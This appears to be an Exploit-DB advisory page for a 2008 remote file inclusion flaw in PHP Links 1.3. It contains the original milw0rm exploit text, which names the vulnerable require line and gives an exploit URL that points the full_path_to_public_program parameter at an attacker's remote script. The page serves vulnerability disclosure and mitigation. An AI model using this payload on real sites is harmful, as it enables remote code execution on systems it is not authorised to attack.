PHP Links from DeltaScripts

vendor:

PHP Links

by:

Houssamix From H-T Team

9.3

CVSS

HIGH

Remote File Inclusion Vulnerability

CWE

Product Name: PHP Links

Affected Version From: 1.3

Affected Version To: 1.3

Patch Exists: YES

Related CWE: N/A

CPE: a:deltascripts:php_links

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

PHP Links from DeltaScripts <= 1.3

A Remote File Inclusion (RFI) vulnerability exists in PHP Links from DeltaScripts version 1.3 and earlier. The vulnerability is due to the application including files based on user-supplied input without proper validation. An attacker can exploit this vulnerability to include arbitrary remote files, resulting in the execution of arbitrary code on the vulnerable system.

Mitigation:

To mitigate this vulnerability, ensure that user-supplied input is properly validated before being used to include files.

Source

Exploit-DB raw data:

-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : Houssamix From H-T Team                          
= Script : PHP Links from DeltaScripts <= 1.3         
                     
        
= Download : http://softadmin.deltascripts.com/download.php
             (PHP Links v1.3 Released 13.09.2007 ) 			 
           
= BUG :  Remote File Inclusion Vulnerability  

= Vulnerable Code : /includes/smarty.php   

require($full_path_to_public_program . "/admin/libs/Smarty.class.php"); <= Line 2

= Exploit :                                                  
http://target/phplinks/includes/smarty.php?full_path_to_public_program=Evil_script


-------------------------------------------------------------
= Greetz : CoNaN - Stack-Terrorist - Gold_M - Rachidox
-------------------------------------------------------------

# milw0rm.com [2008-01-30]